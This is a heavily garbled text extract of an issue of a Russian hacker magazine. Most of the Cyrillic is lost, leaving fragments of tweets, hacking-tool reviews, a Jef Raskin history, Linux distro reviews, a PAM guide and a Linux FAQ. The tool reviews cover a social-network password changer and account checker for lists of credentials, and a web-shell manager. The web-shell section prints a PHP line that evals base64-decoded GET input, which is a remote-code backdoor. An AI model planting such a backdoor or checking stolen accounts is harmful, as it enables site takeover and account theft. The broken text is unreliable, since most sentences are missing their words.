-, twitter.com,
stephenfry w41la8yon37wo4 :).
What are you doing?, Ill
be watching you! From Russia with love :) (
).
:
RegNomSongs by The Police and Matt Monroe. This is a
quiz, right? RT @stephenfry: Ill be watching you! From
Russia with love :)
---

lokimaros@stephenfry How about how


radically changed your life and listening
habits.
--NikkiG57@stephenfry tell them about Russia, Wagner and
your performance at Glastonbury
--valpanna@stephenfry I am afraid, very afraid!
--Benn2100@stephenfry Ill be watching you too
--thisheartbeatz@stephenfry have fun in RUSSIA! B)
--wrathofagony@stephenfry cool in Russia? how is it???
--CybrHwk@stephenfry Your in Russia? Where about in Russia
are you Stephen?
--chriscattaneoRT @stephenfry: Ill be watching you! From
Russia with love :) ok James!
--Betty_Bitch@stephenfry and ill be watching you on dave,
from Wales with love :)
--sjoes@stephenfry Are you in still Russia?
--mio@stephenfry wow o_0 where are you now, Stephen?

, , ,
From Russia with love ,
.


-
, ,
// . , ,
:).
P.S. ,

. z

/ETC/PASSWD

WARNING
warning

.
.
,


,

.
X 08 /128/ 09

063

>>
R0ID
/ R0ID@BK.RU /

>>


:MAIL.RU HISTORY READER
: WINDOWS 2000/XP
:GAR|K

-
IM-
.

.
mail- Mail.ru,
.

, -
. ,
, :). , Mail.ru
History Reader. mail-
.
:
1. , : blabla@
mail.ruhistory.txt
2. DVD

3. history-
:
C:\conv.exe blabla@mail.ruhistory.
txt blabla@mail.ru.txt
4. blabla@mail.u.txt,
:)

mail- <= 5.3,


Gar|k'
,
mail-.
.

: ODNOKLASSNIKI.RU
PASSWORD CHANGER & ACCOUNT
CHECKER
: WINDOWS 2000/XP
: ZDEZ BIL YA
-
,
.

064

,

odnoklassniki.ru
: Odnoklassniki.ru Password Changer
Odnoklassniki.ru Account Checker.
,
.
aka .
:



accounts.txt, : ;.

:
good_acc.txt ,
;_
bad_acc.txt ,
;_
error_acc.txt ,
,

,
bad_acc.txt, :

( )

,

.
:

accounts.txt, :
;.

:
good_acc.txt ,
block_acc.txt , ,
-

bad_acc.txt , -




error_acc.txt , ,

,
. ,
win32-,
PHP/-, . Zdez Bil Ya
:).

: SHELL MANAGER
: *NIX/WIN
: KRIST_ALL
, , web-. ,
,
,
:). :

? Krist_ALL'

Shell manager, . -,
, :
-
X 08 /128/ 09

>>

-
-
- PR//Alexa_Rank
-
( -,
-)
-

:
1. ,
( : password)
2.
3. ,
$install 1
:
//---- ---------------$db_host = ''; //
$db_login = ''; //
$db_password = ''; //
$db_name = ''; //
//---- Shell Mananger---$use_auth = 1; // 1 , 0
$install = 1; // 1,

$password = 'password'; //
.

4. - :
if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss
=base64_decode($_GET['ev']);
eval($sss); exit; }

5. , -.

: FTP PARSER
:*NIX/WIN
: [QWYZ]
-
: ? ,
,
. ,

FTP Parser,
-
. PHP-
3 :
X 08 /128/ 09


- (, blabla.com)




, , :
$z = (, &z=com),
, * (,
&z=*)
$m = (, &m=14), ,
* (, &m=*)
$base = -,
./bases (, &base=file.txt)
$all = (, &all=1,&all=0)
$save = ( ./querie), ,
&save=yes,&save=no
$word =
(,
&word=blabla)

, , ,
./bases ( ) ./queries,
:
http://_/parser.
php?z=com&m=14&base=ftps.txt&all=0&s
ave=yes&word=freehostia.com

, .

: SYMVPN
:SYMBIAN
: TELEXY.COM
-
, - .

SymVPN
, VPN.
Symbian OS 3rd, ,
.
VPN-
SymVPN, PPTP
128- MPPE.
www.telexy.com, Symbian OS.
SymRDP (Symbian Remote Desktop Connection
Client), SymNC (Network Commander)
. , , x-USSR 40% (telexy.com/
Support/Publications.aspx?codeid=WGSBI6X6KV),
.
14 .
, ,
- 820 :).


(email, imei ). ,

IMEI- . ,

, :
1.
2.
3. , ,
(GPRS/Wi-Fi), IP-,
,
VPN-
4. .

,
VPN (IP///
DNS)
5.
( SymVPN)
.
, , VPN-

Symbiain- VPN.
,
.z

065

>>
1) Canon Cat
2) (70- )
3)
4)

MIFRILL
/ MIFRILL@REAL.XAKEP.RU /


IT .
, , ,
, .
, , .
Apple Macintosh, ,
, Apple .

,
,
,
, ,

.
, (Jef)
,
,
.

-, , ,
, .

26- 2005, 61
.

066

,

.

, -

,
:
. , ,
,
.
, ,

(, ,
,

?).

,
.
, , ,
.


.

,

,
Apple
,
,
.
Apple
1978 ,
31- . ,

23 1943,
,
,
.


,

, ,
,
.
Apple
. , , ,
,
,
.
X 08 /128/ 09

>>

3
,
-,
.
, , , IT

.



.

,
:
, .
, , . 70-


Western Wind ( ),
.
, ,


,

-

. Western Wind

(
, 70-)
,

.

, .
X 08 /128/ 09

4
,
? , ,
,
.
, Apple

(
),
!
, ,
, ,
,
( Apple II).
,
,

-
. , ,

(
, ).
.


,
, ,

.
.
, ,


, . 1964-1965
,
,
.
(1967)
,

. , 70-

,
,

.
, ,
Apple
,
, ,
.

APPLE,

,

, .
.

Apple,
Annie,
.
,

.
,
, ,

. ,


,
,
.
, ,
- ,

. , , ,
. ,
(Macintosh)
,


McIntosh, .

,

,
.
-
,
, Apple

.
,

Apple Lisa,
,
.
, -

067

>>

1) Canon
2) Apple Macintosh

( , , ).
, . Apple
, .

1
- , , .
, , [
] , ,
. ,
, ,
GUI
( ),
. ,
,
Lisa.
Apple III, .
( , Apple III $5000-8000), !
Apple III

, ,
. Apple Lisa, ,
Apple III, .
, ,
.
, , .
,
,
. , ,
Lisa , .
, ,
, , , . ,
apple- . ,
. ,
, , Xerox
.
, , .
,
,
, .
,
. ,
,
Macintosh Bicycle, . ,
, ,
,
, . ,
, -
.
1982 , ,
, ,
. ,

,
,
Apple.
. ,
Apple,
. Information Appliance, , .
Information Appliance
Apple II SwyftCard, SwyftWare.
-
, .
, .
, . ,
, ,
, ,
, .
, .
(, ),
, . , ,
, , , .
.
. ?
.
( GUI ),
,
, ,
.
.
SWYFT.
GUI SWYFT , , ,
-. , .
, SWYFT
, ,
. ,
,
, ,
. - , SWYFT
, , ,
.
LEAP (), ,
, Firefox, <Ctrl+F>.
, ,
LEAP-,
. , ,
LEAP
, , .. ,
, .

. , ,
, - , , QWERTY,
X 08 /128/ 09

>>

, .
SWYFT ,
.
(,
), ,
.
SWYFT
Apple II,
.
Information Appliance
,
-
Canon. , Canon
Motorola 68000 (
),
Canon Cat.
, ,
. 1987 ,
,
. .
,
(
20.000 ), ,
Canon
. ,
.
, Canon
, -
,

. , , ,
,
Apple NeXT Computers.
, ,
Canon
( ),

. , ,
.
, ,
.
X 08 /128/ 09

, , ,
,
Canon,

,

2000- !

THE, ARCHI
1989
Information Appliance,

- .
90-,
,

,

. ,
BAYCHI (Bay-Area Computer-Human
Interface) ,
-,
,
IT (,
BMW). , ,

,
,
.

The Humane Interface, 2000 .

: .

-, ,
, ,
:).

SWYFT The Humane Environmen (
THE),
The Humane Interface. ,

,
30 ,
( ,
-, ).
, IT- .
THE ,
Canon Cat. GUI,
, LEAP- ,
-, ..
- ,
, GUI ,
- ,
, .
, , ,
.
, ,
, THE - , ZUI Zooming
User Interface.
, ,
,
,
, 100%.
,
- .

, ,
.
,
1- 2005 ,
THE Archy. Archy
RCHI,

( )
(Raskin Center for Humane Interfaces).
,
.
, ,
26- 2005 .
,
,
.
Humanized Inc., Mozilla,

. , ,
?

,
. ,
GUI,
,
,
,
.
, ,
, ,
. z

069

>> unixoid
MOBLIN V2
UX (USER
EXPERIENCE)
BETA

LINUX MINT 7
GLORIA

FEDORA 11
LEONIDAS

CALCULATE
LINUX
DESKTOP 9.6
XFCE

BOBER
/ ZLOY.BOBR@GMAIL.COM /


Linux- - 2009

>> unixoid

GNU/Linux- , , - . , , z
.
FEDORA 11 LEONIDAS
: Fedora 11
: fedoraproject.org
: 9 2009
: GPL
: i586, x86_64, PPC,
PPC64, s390, s390x

070

: Intel Pentium II 400


, 256/384 M RAM (x86/x86_64), 3 ( 9 ).
Kernel 2.6.30, Glibc 2.10.1, Udev 141, HAL 0.5.12,
X.org 1.6.1.901, GNOME 2.26.0, KDE 4.2.90,
OpenOffice.Org 3.1.1
: 2010


, 9 18:00
FTP-
, ,
.
X 08 /128/ 09

>> unixoid

. : Desktop
Edition, LiveCD- GNOME KDE
( i686 x64 )
. 1
DVD 6 CD ( cd1). ,
. Desktop Edition

,
;
.
.
, 2008
Wikipedia
RHEL/Fedora Ubuntu, ,
: -
2 + 1
. , Fedora
6-8 ,
. LTS-, Ubuntu,
. . ,
Fedora,
DVD- (
docs.fedoraproject.org
ch-upgrade-x86.
html). ,
(
), Fedora 9
10, 11.
.
Fedora .
gcc 4.4, .
MinGW
Windows (
mingw32-*).
xt4.
xt4
Fedora 9, , ,
.
ext2/3. 48- ,
,
,
. , ext4

,
.
, ext4 . (Delayed
allocation), - 60
X 08 /128/ 09

MINTINSTALL
, , .
.
2.6.30 ,

. /
boot ext2/3; ext4
.
.
, ,

(, ).
, .

Presto. diff-,
.
60-80% . ,
yum install
yum-presto. , RPM
4.7.
, .
PackageKit , ,

.
, .
, , MIME. , GNOME.
KDE mp3-
, (JuK),
.

:
# rpm -Uhv http://download1.
rpmfusion.org/free/fedora/
rpmfusion-free-release-rawhide.
noarch.rpm http://download1.
rpmfusion.org/nonfree/fedora/
rpmfusion-nonfree-releaserawhide.noarch.rpm
# yum install gstreamer-pluginsbad gstreamer-plugins-ugly


,
20 .
, Bluetooth.
,
.
, ,
. , ,
:
# yum grouplist //

# yum groupinstall Russian


Support

(yum groupinstall XFCE).


, ,
PulseAudio,
, .

,
.

071

>> unixoid

Calculate Linux Desktop 9.7 KDE.
: Kernel 2.6.28.10, KDE 4.2.4, X.Org 7.4, OpenOffice 3.0.1.
:
;
;
2.5 KDE;
USB Flash DVD HDD.
2 Flash;
LiveDVD .
2 .
calculate --update :
# layman -S && emerge calculate

INFO

info
Intel
Moblin Linux
Foundation.

Moblin :
Acer, HP, ASUS, MSI

.

Anaconda . , ,
. ,

Setup Agent.
LiveUSB Creator, .
, , KPackageKit
. yum update
61 .
,
KDE .
GNOME .

CALCULATE

CALCULATE

LINUX MINT 7 GLORIA


: Linux Mint 7 Gloria
: linuxmint.com
: 26 2009
: GPL
: x86 (x86_64 )
: Intel Pentium AMD CPU, 512
( , 256 )
2.5
Kernel 2.6.28, Glibc 2.9, Udev 141, HAL 0.5.12rc1, X.org 7.4,
GNOME 2.26, OpenOffice.Org 3.0.1
: 2010
-

FEDORA LINUX

HTTP://WWW
links
DistroWatch
(distrowatch.com)
,
,


Linux,
/
OpenSolaris
xBSD.

072

X 08 /128/ 09

>> unixoid

MOBLIN
Linux Mint. , ,
Ubuntu +
( ) , 3- distrowatch.
com, openSUSE.
Mint 2006 ;
Clement Lefebvre.
Linux,
. Mint : , ,
,
. ,
- ,
.
APT- . ( , 1 ) .mint-,
, .
Software Portal . , Ubuntu.
5,
. Mint , Mint 1 Ada.
Linux Mint 7 Ubuntu 9.04 Jaunty Jackalope
LiveCD/DVD ,
. x86- (
64- ,
). GNOME.
Mint , ,
7 .
:
Main Edition LiveCD-, , ;
Universal Edition LiveDVD (1,3 ), X 08 /128/ 09

, .
, Main,
, .
. , Main
Edition, .
Live-
. . ,
.
Windows, . Computer.
mintDesktop, Compiz.
mintMenu KDE4.
; ,



Fedora 11 Spins
(fedoraproject.org/wiki/Releases/11/Spins),
: XFce ( ), Games,
Fedora Electronic Lab, Educations (
, ) AOS
(Appliance Operating System),
. OEM- . , .
Russian Fedora Remix 11 (www.
russianfedora.ru) Fedora . ;
, .

073

>> unixoid
Filter. , .
, . ,
. ,
Gnome Do.
,
: , , , ,
, , .
/etc/apt/source.list ,
Medibuntu.
Synaptic mintInstall, , .
.
. More Info

FEDORA
. Visit, .
Featured applications , .
Mint Gufw,
( ), Advanced. , mintNanny.
, /etc/hosts
0.0.0.0.
;
.
, Synaptic, russian
. GNOME
language-pack-gnome-ru.

CALCULATE LINUX DESKTOP 9.6 XFCE


: Calculate Linux Desktop 9.6 XFCE
: www.calculate-linux.ru
: 4 2009
: GPL
: i686, x86_64
: Intel Pentium Pro AMD Athlon CPU,
256/512 M RAM 3/6
Kernel 2.6.28.10, Glibc 2.8, Udev 141, HAL 0.5.11, X.org 7.4, XFCE 4.6.1,
OpenOffice.Org 3.0.1.3
Calculate Linux ,
Gentoo, Gentoo

. Calculate Pack
.
: Calculate Linux
Desktop (CLD) KDE 4.2.3/XFCE 4.6.1 Calculate Directory Server (CDS).
Ubuntu (.).
, . Calculate Gentoo,
. ( Perl-) Calculate,
, , ISO, ( , ).
Calculate Overlay (svn.
calculate.ru/overlay). , Google Group
(groups.google.com/group/calculatelinux) IRC- (irc.

calculate-linux.ru, -).
HDD USB-HDD ext4, ext3, ext2, ReiserFS, JFS XFS. FTP/
HTTP LiveCD. Torrent LiveDVD.
FTP
, . KDE
CLD, XFCE CLD. .
:
( - );
( 2
);
Memtest.
( ), , .
( XFCE-);
. DHCP- ,
Wicd.
Live- guest/guest.
root su.
LZMA-
, . OpenOffice.org 3.0.1, StarDict, Firefox 3.0.10
( Flash-), ClawsMail, Pidgin, XChat, GIMP 2.6.6, Audacious,
Mplayer gnome-mplayer. , .
, <Caps Lock>.
calculate. ,
, :
# calculate --update

(www.calculate-linux.ru/_) , ,
:
# alculate --disk=/dev/sda2

root.
ReiserFS,
GRUB MBR. . Calculate
, > 45 ( ), : alculate --disk=/dev/sda.
.
Gentoo emerge.
:
ISO - /usr/calculate/share/linux
calculate. ,
.

MOBLIN V2 UX (USER EXPERIENCE) BETA


: Moblin v2 UX Beta
: moblin.org
: 19 2009
: GPL
: Intel Atom (x86)
:
Moblin OpenSource-, Linux- , ,
- (MID, Mobile Internet Device)
.
Intel,

074
X 08 /128/ 09

>> unixoid

LINUX MINT
, , , Moblin
x86- AMD Geode VIA Nano/C7.
: Acer Aspire One, Asus eeePC 901, 1000H, Dell Mini
9, MSI Wind, Lenovo S10, Samsung NC10, HP Mini 1010 1120NR.
.
, ,
,
.
Moblin Fedora (
, 9). - ,
Clutter (clutter-project.org), OpenGL OpenGL ES
( , www.khronos.org/opengles).
Clutter OpenedHand,
Intel. , Clutter
GLX- X.org,
Android, Moblin Linux. , .
img- 700 ,
USB- CD.
dd.
image-writer (git.moblin.org/cgit.cgi/
moblin-image-creator/plain/image-writer).
Live- (netboot).
XFCE, . , X 08 /128/ 09

.
, - .
, .
.
. (
) Favourite Applications.
m_zone ,
Twitter Last.fm.
, .

(, ). ,
, .
Bickley (moblin.org/projects/bickley)
.
Moblin -,
Mozilla Gecko, , IM- Empathy (
Jabber, Gtalk, ICQ, MSN, IRC, Salut)
. Moblin Image Creator 2
(MIC2), Moblin.

,
. , , . ,
, , . z

075

>> unixoid


/ ZOBNIN@GMAIL.COM /

PAM

>> unixoid

PAM
UNIX. , .
,
USB-, chroot-
-.

FEDORA 11 LEONIDAS
PAM
PAM (Pluggable
Authentication Modules)
( PAM , z
2006 , ..) , ,
.

, ,
/ .

076

/bin/login, .
PAM /etc/passwd .
PAM,
/bin/login
. ,
PAM
,
(
!)
( chroot -

!)
.
PAM ,
/ .
/etc/pam.d. /etc/pam.d/
login, /bin/login:
# vi /etc/pam.d/login
auth
sufficient pam_self.so
no_warn
auth
include
system
X 08 /128/ 09

>> unixoid

PAM_ABL
account requisite
so
account required
account include
session include
password include

pam_securetty.
pam_nologin.so
system
system
system

PAM
,
, PAM-,
.
:
auth , ;
account , ,
;
session (,
);
password ,

( /usr/
bin/passwd).
, ,
()
. , (
,
/etc/security).
include,
( ).
system ( /etc/pam).
FreeBSD; Linux- Debian Ubuntu
common-*
(common-auth, common-session ..), Gentoo
Mandriva system-*.
PAM,
/etc/passwd :
auth required pam_unix.so no_warn
try_first_pass nullok

, ,
.
X 08 /128/ 09

. ,

, , (
, ). , , /etc/pam.d/
su, auth :
# vi /etc/pam.d/su
auth
sufficient pam_rootok.so
no_warn
auth
sufficient pam_self.so no_
warn
auth
requisite pam_group.
so no_warn group=wheel root_only
fail_safe
auth
include
system

pam_rootok, UID , , ,
.
( sufficient).
( root), pam_self,
, UID UID ,
.
,
( : vasya
su vasya, ,
su , ). pam_group
wheel, , ,
( requisite).
,
auth /etc/pam.d/system (
pam_unix, ).
.
, su ?

auth sufficient pam_deny.so.
pam_deny false.
, su
, root.
pam_permit, .
/etc/pam.d/su auth sufficient
pam_permit.so, su ,

, .
,
.

USB-

Linux-PAM
OpenPAM
,
auth. , ,
pam_guest,

, pam_ftpusers,
/etc/ftpusers, pam_securetty,

,
secure /etc/ttys ( /etc/securetty Linux).

,
.

,
USB-,
- . , , pam_usb.
USB-

. ,
. ?
.
FreeBSD pam_usb ,
Linux ( Debian/
Ubuntu). pam_usb
:
# apt-get install libpam-usb
pamusb-tools

USB- pamusbconf, :
# pamusb-conf --add-device _

,
, ,

077

>> unixoid
PAM
PAM Sun Microsystems, 1995 . PAM Solaris 2.3,
UNIX- , Linux,
FreeBSD, NetBSD Mac OS X. API PAM
XSSO. PAM :
, Solaris;
Linux-PAM, Linux;
OpenPAM, BSD-.

INFO

, . , y.
,
USB-:
# pamusb-conf --add-user root

info

Linux-PAM
Red Hat,

RedHat
3.0.4 (1996 ).
FreeBSD
OpenPAM
.
LinuxPAM.

, y
:
# pamusb-check root

pam_usb .
pam_usb auth .
PAM, , /etc/pam.d/

PAM
SSHD
common-auth.
, pam_unix.so,
auth sufficient pam_usb.so. ,
PAM
common-auth, , USB-,
.
.
fprint (www.reactivated.
net/fprint/wiki/Main_Page),

( USB-)
. ,
pam_fprint.
libfprint pam_fprint
Ubuntu Fedora
FreeBSD (/usr/ports/security/pam_fprint). ,

OPENPAM



PAM /etc/
pam.d
/etc/
pam.conf.

HTTP://WWW
links

PAM
: www.
xakep.ru/magazine/
xa/086/112/1.asp.

078

X 08 /128/ 09

>> unixoid

PAM
.
:
$ pam_fprint_enroll --enroll-finger 6

6 .
fprint ,
, 1 , 8
.
. pam_fprint auth
. /etc/
pam.d/common-auth ( /etc/pam.d/system FreeBSD)
auth sufficient pam_fprint.
so. required
sufficient,
( ;
).

,


PAM -
, , . X 08 /128/ 09

:
PAM-,
.
, , pam_listfile (
Linux-PAM). .
PAM-

/etc/users.allow:
auth sufficient pam_listfile.so item=user
sense=allow file=/etc/users.allow onerr=fail

,
:

WARNING

info
OpenBSD PAM .
PAM
Kerberos.

auth sufficient pam_listfile.so item=user


sense=deny file=/etc/users.deny onerr=fail

, item tty, user, rhost, ruser, group, shell.


/ , ,
, /,
..
pam_access.
-

079

>> unixoid

PAM FREEBSD
account (,
, ,
, ). ssh .
account: account required
pam_access.so /etc/security/access.conf
:
# vi /etc/security/access.conf
+ : ALL : 192.168.1
+ : good_guy : ALL
- : ALL : ALL

, ssh
192.168.1.0 good_guy. .

pam_lockout (ostatic.com/pam-lockout).
PAM: auth requisite pam_lockout.so user=bad_guy.
pam_alredyloggedin (ilya-evseev.
narod.ru/posix/pam_alreadyloggedin).
,
( , ,
<Alt+Fx>).
auth (
):
auth required /lib/security/pam_securetty.so
auth sufficient /lib/security/pam_alreadyloggedin.so
no_root

080

,
pam_pwdfile (cpbotha.net/software/pam_pwdfile).
,
/etc/passwd. , .
: FTP- vsftpd. , . : pam_pwdfile,
vsftpd.
/etc/pam.d/vsftpd:
auth required pam_pwdfile.so pwdfile /usr/local/etc/
vsftpd/vsftpd.users
account required pam_pwdfile.so pwdfile /usr/local/
etc/vsftpd/vsftpd.users

chpwdfile
(eclipse.che.uct.ac.za/chpwdfile) : :MD5--.
pam_abl (hexten.net/
pam_abl),
-.
UNIX . ,
,
. /etc/pam.d/sshd
auth required pam_abl.so config=/etc/
security/pam_abl.conf. . , , X 08 /128/ 09

>> unixoid
,
.
- . /etc/security/pam_abl.conf
:
# vi /etc/security/pam_abl.conf
//
host_db=/var/lib/abl/hosts.db
//
host_purge=2d
// 10
1
host_rule=*:10/1h

,
, CHROOT
, PAM- session
, . ,
.
pam_limits
Linux-PAM ( OpenPAM).
/etc/
security/limits.conf.
, pam_chroot (sourceforge.net/
projects/pam-chroot),
. ,
shell-, ftp- -
, . .
:
# echo 'session required pam_chroot.so' >> /etc/pam.d/
ssh
# echo 'vasya /usr/chroot' >> /etc/security/chroot.
conf

, vasya, ssh-, /usr/chroot .


pam_mkhomedir
Linux-PAM,
.
,
,
Windows/UNIX, .
, Active Directory
,
.
, AD,
UNIX-
:
# echo 'session required pam_mkhomedir.so skel=/etc/
skel/ umask=027' >> /etc/pam.d/common-session

pam_winbind,
AD, pam_ldap, , LDAP.
Linux pam_namespace.
(/tmp, )
. , /tmp
X 08 /128/ 09

.
, (race
condition), .
/etc/security/
namespace.conf ,
. /tmp:
# mkdir /tmp-inst
# chmod 0 /tmp-inst
# echo "/tmp /tmp-inst/ user root" >> /etc/security/
namespace.conf
# echo "session required pam_namespace.so" >> /etc/
pam.d/common-session

: /tmp ,
root ( /tmp-inst/).
/home (
) :
$HOME $HOME/$USER.inst/ user root



PAM- password ,
. ,
.
pam_cracklib

:
;
, ;
, (UnixOid, UnIxOiD);
- ( : unixoid,
: dioxinu);

, .
, pam_
cracklib /etc/pam.d/passwd, passwd.
:
password required pam_cracklib.so retry=3 minlen=8
dcredit=-2 ucredit=-1 ocredit=-1 lcredit=0
password required pam_unix.so use_authtok

: 6 , ,

(, ).

PAM ,
,
.
,
,
PAM, ( ).
www.
kernel.org/pub/linux/libs/pam/modules.html.
PAM,
Linux-PAM. z

081

>> unixoid

/ ZOBNIN@GMAIL.CO /, / GRINDER@UA.FM/, / DHSILABS@MAIL.RU/

-

MegaFAQ Linux

>> unixoid

Linux- ,
512 ASUS EeePC.
, ,
Firefox
.
Linux, 16 i486? , ,
,
, .
Q.
Linux . .
- ?
A. , , .
, /etc/init.d/rc
:

082

for i in /etc/rc$runlevel.d/S*
do
case "$runlevel" in

*) startup $i start ;;
esac
done

*) startup $i start ;;
*) startup $i start & ;;.
:
,
.

. , Linux , X 08 /128/ 09

>> unixoid

,
.

:
# echo "20" > /proc/sys/vm/
swappiness

/etc/sysctl.conf:
vm.swappiness = 20


.
,
, ( ),

,
:

INIT-NG
.
.
. ,
4 : A, B, C D, C ,
, , 15-20, D
, C. , C , D ,
C. , D .
. ? : cinit,
, . , cinit
D, C, D, .
cinit
: nico.schottelius.org/documentations/
speeches/metarheinmain-chaosdays-110b/
cinit/view.

InitNG (Init Next Generation).
z _03_2006).
, upstart,
, ~10 .
Q. ?
A.
(drakxservices Mandriva, systemconfig-services Fedora, services-admin
Ubuntu),
rcN.d-
(
, -
).
X 08 /128/ 09

Q. ?
A. free .
(
) ?
, ,

-, , .
.

( 512 ):
# dd if=/dev/zero of=/swap/sw-file
bs=1k count=524288
# mkswap /swap/sw-file 524288
# swapon /swap/sw-file


, (
swapon -a).
Q. ?
A. ,

20 30. ,
. ,
.

,
, OpenOffice,
GIMP,
, 70, , 80 85.

vm.pagecache = 90
vm.dirty_ratio = 50

Q.
?
A.

. hdparm,

. ,
:
$ hdparm /dev/sda
$ hdparm -i /dev/sda

,

:
MaxMultSect/MultSect /
,
(
);
PIO modes/DMA modes ,
(, , );
multcount ;
I/O support
(16- , 32- 32 );
using_dma DMA ;
readahead .

(
) /etc/hdparm.conf /etc/
default/hdparm ( ).

hdparm -tT /dev/sda.
DMA (-d1), 32-

083

>> unixoid
/
,

Linux /
(I/O scheduler) . I/O scheduler , /sys/
block/sda/queue/scheduler:
# cat /sys/block/sda/queue/scheduler
noop anticipatory deadline [cfq]

SYSTEM-CONFIG-SERVICES

CFQ (Completely Fair Queuing), ,


,
, ,
I/O . Deadline Anticipatory:

I/O (c1); multicount (-m64),


multicount (-a64).
-u1 ,
:

# echo anticipatory > /sys/block/sda/queue/scheduler


# hdparm -u1c1d1m64a64 /dev/sda

: O(1), CFS (Completely Fair Scheduler, ,


2.6.23) , , , .
, z_12_2007.

-W (0/1), /
. -

FREE

084

X 08 /128/ 09

>> unixoid

.
Q. ?
A. nice,
, ionice

. Ubuntu ionice
schedutils.
:
ionice -c -n -p PID

0 7 ( ,
). :
1. Real time ,
(8
[0-7]);
2. Best Effort ,
(8
);
3. Idle ,
; .
PID :
$ sudo ionice -c2 -n0 mplayer

Q. ?
A. .
,
, . , , ext3,
Linux-.
, :
.
, ,
.
,
,

. :
#1. ,
/.
#2. /usr, .
#3. /home,
.
#4. /tmp, .
#5. /var, .


,
(
)? : .
ext2 (
X 08 /128/ 09

DRAKXSERVICES
) noatime ( ).
/tmp,
, atime .
/var ,

ReiserFS, /home ,
.
, /tmp
tmpfs,

. ,
, .
/etc/fstab:
tmpfs /tmp tmpfs size=512m,mode=1777
00

: ,
ext4.
, ,
, , ext4
,
.
Q. ?
A.
,
X.org. ATI nVidia,
- 2D- (
), .

nv,
KDE 4.1.1.
UT, 166

( ),
1 , 2.6-
.

XFCE. ?
, nv,

2D- ( 2D) .
, nvclock (www.linuxhardware.org/
nvclock), , .

nVidia 5900FX. -
Far Cry ( wine).

,
nvclock -f -n 540, 400 540,

.
3D-
. , (
, 3D- ),


.
Q. Compiz?
A. . , Ubuntu


.
:
# gtk-window-decorator --replace
( GNOME)
# kde-window-decorator --replace

085

>> unixoid

UBUNTU
( KDE)

Q. -
?
A. , . ATI nVidia,
, ,
GPU. Khronos Group,
OpenCL (www.khronos.
org/opencl), GPU . ,
,
.
. Linux
Memory Technology

086

Device (MTD),
,
, PCI. , en.gentoo-wiki.com/
wiki/TIP_Use_memory_on_video_card_as_swap,
()
,
.
,
, /tmp. :
,

VGA-.
Q. - , .
?

A. Linux
IPv6.
IP , . , ipv6,
/etc/modprobe.conf,
, /etc/modprobe.d/
blacklist.local blacklist ipv6.
, / TCP window
scaling,
TCP-,
,
.
:
# sysctl -w net.ipv4.tcp_window_
scaling=0
X 08 /128/ 09

>> unixoid
,
/etc/sysctl.conf:
net.ipv4.tcp_window_scaling=0

TCP window
scaling,
TCP- :
net.ipv4.tcp_rmem = 4096 87380
174760
net.ipv4.tcp_wmem = 4096 87380
174760

UDP:
net.ipv4.udp_rmem_min = 16384
net.ipv4.udp_wmem_min = 16384
net.ipv4.udp_mem = 8388608 12582912
16777216

Linux 2.6
,
:
net.ipv4.tcp_no_metrics_save = 1
net.ipv4.tcp_moderate_rcvbuf = 1
net.core.netdev_max_backlog = 2500

,
: sysctl -a | grep tcp.
.
txqueuelen
ifconfig:
# ifconfig eth0 txqueuelen 1000

2.6.7, reno
( ).
, :
# sysctl net.ipv4.tcp_available_
congestion_control

,
.
6 : reno, cubic, bic, htcp, vegas westwood.
,
cubic htcp,
. ,
,
westwood.
:
sysctl -w net.ipv4.tcp_congestion_
control=htcp

Q.
?
A.
X 08 /128/ 09

cron,
,
/etc/cron.hourly
(), /etc/cron.daily (), /etc/
cron.weekly () /etc/cron.monthly
().
,
,
.
/etc/cron.hourly (
).
Q.
?
A. , !
mcompress, :
#!/bin/sh
VER=' uname -r`
MAJ='uname -r | awk -F. '{print $1}'`
MIN='uname -r | awk -F. '{print $2}'`
if [ $MAJ -ge 2 -a $MIN -ge 5 ]; then
OBJ=ko
else
OBJ=o
fi
find /lib/modules/'uname -r'/ -name
*.$OBJ -exec gzip -9 '{}'';'
depmod -a; depmod -A

Q.
?
A. . :
xsane, sane-utils, libsane, foomatic-db-hpijs,
hpijs, hplip
HP ( HP, ,
,
);
w3m ( , ?
);
bogofilter, bogofilter-{bdb,common} ;
splix Samsung
SPL2 ( Lexmark, SPL2
);
gucharmap ;
onboard ;
rss-glx .
. .

,
. , ttf-arabeyes,
ttf-lao, ttf-arphic-uming, ttf-sazamani*, ttf-indic*,
ttf-unfonts-core, ttf-thai* .

80 .

.
.

. OpenOffice GIMP?
, ,

.
, , .
,
README, CHANGES, GPL, LICENSE, AUTHORS,
ChangeLog .. , !
.
/usr/share/doc , .
,
- ,
,
.
250 .
Q.
?
A. ,
.
.
.
,
3-5%,
Gentoo Stage1
:
O2
.
fomit-frame-pointer
.
funroll-loops .
mcpu=_ .
march=_ +
.
pipe
( ).
-mcpu -march
: gcc.gnu.org/onlinedocs/gcc/i386and-x86_002d64-Options.html.
.
, totem,
amarok, k3b, firefox, thunderbird
. wmii, ion3 awesome,
mc , links2, dillo
elinks web, mutt
, snownews RSS, sonata
+ mpd , mplayer .

,
.

.
.

,

screen/tmux. z

087

++++

>> coding

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

GUI PYTHON!
/SHPAK.VADIM@GMAIL.COM/


, .
. GUI
Python.
GUI PYTHONE

GUI. Python . GUI
. -, ,
Python. -, GUI-.
GUI-: Tkinter Tcl/Tk, wxPython
wxWidgets, PyQt Qt ( , ). Tkinter
Python, GUI .
wxPython. GUI-
wxWindows.

IDE
IDE, GUI. , , ,
. , wxPython BoaConstructor. GUI:
, ,
( ). IDE ,
.
.
wxPython .

HELLO, WORLD!
:
GUI GUI! ,
Hello, world! wxPythone.

++++
import wx

++++

++++

++++

class HelloFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, id=-1, parent=None,
pos=wx.Point(422, 270), size=
wx.Size(300, 200), title=Hello Frame)
self.panel = wx.Panel(self)
self.helloButton = wx.Button(id=-1, label=
Push me.,parent=self.panel,

088

pos=wx.Point(110, 75), size=wx.Size(80, 30))


self.panel.Bind(wx.EVT_BUTTON,
self.OnButtonClick, self.helloButton)
def OnButtonClick(self, event):
print Hello, world!
class HelloApp(wx.App):
def OnInit(self):
frame = HelloFrame()
frame.Show(True)
return True
if __name__ == __main__:
app = HelloApp()
app.MainLoop()

, Hello, world!.

?
. wxPython-
: .
,
, . :
1) app = wx.PySimpleApp() ,
wx.App . ,
wxPython.
2) OnInit() .
. False, .
3) frame = HelloFrame() (
wx.Frame ). , , OnInit()
,
! ( ), .
( SetTopWindow()) ( , ).
X 08 /128/ 09

>> coding

BOACONSTRUCTOR IDE GUI
